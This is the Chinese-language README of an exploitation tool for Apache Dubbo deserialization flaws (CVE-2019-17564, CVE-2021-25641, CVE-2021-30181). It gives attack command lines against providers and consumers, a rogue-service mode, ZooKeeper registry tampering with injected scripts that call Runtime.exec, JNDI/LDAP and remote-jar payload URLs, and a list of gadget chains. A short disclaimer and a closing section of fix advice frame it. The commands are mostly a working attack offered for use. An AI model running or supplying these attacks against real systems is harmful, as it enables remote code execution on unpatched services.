工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果使用者负责
-
一、使用帮助
usage: java -jar exp.jar [OPTION] - -h --help 帮助信息 - -l --list 输出所有gadget信息 - -g --gadget <arg> gadget名称 - -a --args <arg> gadget入参,多个参数使用多次该命令传入,例-a http://127.0.0.1:80/ -a Calc - -p --protocol <arg> [dubbo|http] 通讯协议名称,默认缺省dubbo - -s --serialization <arg> [hessian|java] 序列化类型,默认缺省hessian - -t --target <arg> 目标,例:127.0.0.1:20880 - -f --fastcheck <arg> 快速攻击检查(使用预置参数数据文件,遍历所有gadget进行攻击检查),参数为数据文件路径,参考文件check.data - -e --evil 恶意服务模式,也就是通过返回恶意序列化数据给客户端,从而攻击连接进来的服务 - -evilHost <arg> 恶意服务ip - -evilPort <arg> 恶意服务port - -registry <arg> [zookeeper],暂时仅实现了攻击zookeeper,恶意服务模式下,攻击注册中心,控制客户端连接到本恶意服务,也就是通过返回恶意序列化数据给客户端,从而攻击连接进来的服务 - -scheme <arg> [auth|digest],zookeeper认证类型 - -username <arg> [zookeeperUsername],zookeeper认证账号 - -password <arg> [zookeeperPassword],zookeeper认证密码,digest:要对passWord进行MD5哈希,然后再进行bese64 - -registryURL <arg> zookeeper url,例:127.0.0.1:2181 - --wait <arg> 等待客户端回连超时时间,默认1000(毫秒)
-
二、example
-
1、快速检测
-
1.1、恶意服务-被动攻击(攻击客户端consumer) PS:使用被动攻击快速检测办法,有多少个gadget就会打开多少个恶意服务端口(因为客户端存在失败记录,不会再连接), 每个端口返回一种gadget恶意序列化数据,等待客户端连接上来,会比较慢,就是视业务调用频率和心跳,所以,建议使用单个gadget精准打击。
例(使用恶意服务快速被动攻击dubbo客户端):
-e -evilHost 127.0.0.1 -evilPort 44444 --serialization java --wait 5000 -f /Users/xuanyonghao/security/java/my-project/dubbo-exp/check.data
例(使用恶意服务并主动篡改zookeeper,快速主动攻击dubbo客户端):
-e -evilHost 127.0.0.1 -evilPort 44444 -registry zookeeper -registryURL 127.0.0.1:2181 --serialization java --wait 5000 -f /Users/xuanyonghao/security/java/my-project/dubbo-exp/check.data
-
1.2、快速主动攻击(攻击服务端provider) 例(快速攻击检测,若不指定序列化类型,则全部gadget都会尝试):
java -jar dubbo-exp.jar --target 127.0.0.1:20881 --fastcheck /Users/threedr3am/dubbo-exp/check.data
check.dat预置参数文件内容:
### 快速漏洞攻击参数配置(将会根据相应匹配的参数选择对应的所有gadget攻击) ### 多个参数英文逗号分割 #JNDI注入url,JNDI注入需要考虑对方jdk版本,若是jdk8, # 当小于jdk8u121,可以使用rmi服务进行JNDI注入攻击, # jdk8u121~jdk8u191之间可以选择ldap服务替代, # jdk8u191+需要使用tomcat-el依赖打法,或者使用gadget JNDI=ldap://127.0.0.1:43658/Calc #执行的shell命令 CMD=/System/Applications/Calculator.app/Contents/MacOS/Calculator #或者 CMD=/bin/bash,-c,/System/Applications/Calculator.app/Contents/MacOS/Calculator #Reference远程class代码url(在http服务器根存在一个Calc.class) CODEBASE=http://127.0.0.1:80,Calc #恶意jar包url(在http服务器根存在一个R.jar,jar包中存在一个恶意的class - Calc.class) JAR=http://127.0.0.1:8080/R.jar,Calc #DNS服务url DNS=http://xxxx.ceye.io
-
-
2、特定gadget检测
-
2.1、主动攻击(攻击服务端provider) 例(测试dubbo默认缺省情况下使用的dubbo协议+hessian2反序列化):
--target 127.0.0.1:20881 --protocol dubbo --serialization hessian --gadget rome --args ldap://127.0.0.1:43658/Calc
例(测试dubbo在使用http协议+java反序列化,dubbo < 2.7.5前使用http协议,后续改为了jsonrpc)CVE-2019-17564:
--target 127.0.0.1:8080/org.apache.dubbo.samples.http.api.DemoService --protocol http --serialization java --gadget CommonsCollections8 --args /System/Applications/Calculator.app/Contents/MacOS/Calculator
-
2.2、恶意服务-被动攻击(攻击客户端consumer) 例(使用恶意服务攻击dubbo客户端):
-e -evilHost 127.0.0.1 -evilPort 44444 --serialization java --gadget CommonsCollections8 --args /System/Applications/Calculator.app/Contents/MacOS/Calculator
-
2.3、恶意服务-主动攻击(攻击客户端consumer) 例(使用恶意服务并主动篡改zookeeper,主动攻击dubbo客户端):
-e -evilHost 127.0.0.1 -evilPort 44444 -registry zookeeper -registryURL 127.0.0.1:2181 --serialization java --gadget CommonsCollections8 -f /Users/xuanyonghao/security/java/my-project/dubbo-exp/check.data
-
-
3、route攻击(CVE-2021-30181)
- 3.1、注入js脚本主动攻击(攻击客户端consumer)
例(通过在zookeeper注入脚本,实现攻击客户端consumer):
-registry zookeeper -registryURL 127.0.0.1:2181 -route script -rule "s=[3];s[0]='/bin/bash';s[1]='-c';s[2]='open -a calculator';java.lang.Runtime.getRuntime().exec(s);" -routeDeleteTtl 5
- 3.1、注入js脚本主动攻击(攻击客户端consumer)
例(通过在zookeeper注入脚本,实现攻击客户端consumer):
-
-
三、gadget列表
- 名称:resin
- 需要入参数量:2
- 参数说明:arg[0]=恶意类所在web服务器ip,例:http://127.0.0.1:8080/,arg[1]=恶意类类名,此处需要恶意类无包名编译出来的
- 序列化类型:hessian
- 依赖:com.caucho:quercus:* dubbo版本<=2.7.5
- 名称:rome
- 需要入参数量:1
- 参数说明:arg[0]=ldap引用外部class地址,例:ldap://127.0.0.1:43658/Calc(ldap协议的JNDI服务可打jdk8u191及以下版本,大于jdk8u191需要使用gadget字节码)
- 序列化类型:hessian
- 依赖:com.rometools:rome:* dubbo版本<=2.7.5
- 名称:spring-aop
- 需要入参数量:1
- 参数说明:arg[0]=ldap引用外部class地址,例:ldap://127.0.0.1:43658/Calc(ldap协议的JNDI服务可打jdk8u191及以下版本,大于jdk8u191需要使用gadget字节码)
- 序列化类型:hessian
- 依赖:org.springframework:spring-aop 受Spring版本限制
- 名称:xbean
- 需要入参数量:2
- 参数说明:arg[0]=恶意类所在web服务器ip,例:http://127.0.0.1:8080/,arg[1]=恶意类类名,此处需要恶意类无包名编译出来的
- 序列化类型:hessian
- 依赖:org.apache.xbean:xbean-naming:* dubbo版本<2.7.5
- 名称:CommonsBeanutils
- 需要入参数量:1
- 参数说明:arg[0]=ldap引用外部class地址,例:ldap://127.0.0.1:43658/Calc(ldap协议的JNDI服务可打jdk8u191及以下版本,大于jdk8u191需要使用gadget字节码)
- 序列化类型:java
- 依赖:
- 名称:CommonsBeanutils1
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-beanutils:commons-beanutils:1.9.2
- 名称:CommonsCollections1
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections2
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:org.apache.commons:commons-collections4:4.0
- 名称:CommonsCollections3
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections3ForLoadJar
- 需要入参数量:2
- 参数说明:arg[0]=jar包下载地址,例:http://127.0.0.1:8080/R.jar,arg[1]=jar包中恶意类名称
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections5
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections5ForLoadJar
- 需要入参数量:2
- 参数说明:arg[0]=jar包下载地址,例:http://127.0.0.1:8080/R.jar,arg[1]=jar包中恶意类名称
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections6
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections6ForLoadJar
- 需要入参数量:2
- 参数说明:arg[0]=jar包下载地址,例:http://127.0.0.1:8080/R.jar,arg[1]=jar包中恶意类名称
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections7
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections8
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:org.apache.commons:commons-collections4:4.0
- 名称:CommonsCollections9
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections10
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections11
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.2.1
- 名称:URLDNS
- 需要入参数量:1
- 参数说明:arg[0]=dns server url
- 序列化类型:java
- 依赖:
- 名称:C3P0
- 需要入参数量:2
- 参数说明:arg[0]=恶意类所在web服务器ip,例:http://127.0.0.1:8080/,arg[1]=恶意类类名,此处需要恶意类无包名编译出来的
- 序列化类型:java
- 依赖:com.mchange:c3p0:0.9.5.2 com.mchange:mchange-commons-java:0.2.11
- 名称:rome
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:com.rometools:rome:*
-
四、漏洞修复建议
- 默认缺省的dubbo协议hessian反序列化漏洞:参考 learnjavabug 项目module->dubbo/dubbo-hessian2-safe-reinforcement,使用反序列化黑名单形式进行安全加固
- dubbo版本<2.7.5,http协议反序列化漏洞(CVE-2019-17564):升级到最新版本2.7.5修复
- dubbo版本<=2.7.7、<=2.6.8、2.5.x,注册中心(zookeeper)未授权或者弱口令导致可读写,进行恶意服务DubboRouge被动攻击(CVE-2021-25641):建议检查Zookeeper这些服务的脆弱性进行防护,并升级到2.7.8、2.6.9修复
- dubbo版本<=2.7.7、<=2.6.8、2.5.x,注册中心(zookeeper)未授权或者弱口令导致可读写,插入恶意脚本攻击客户端consumer(CVE-2021-30181):建议检查Zookeeper这些服务的脆弱性进行防护,并升级到2.7.8、2.6.9修复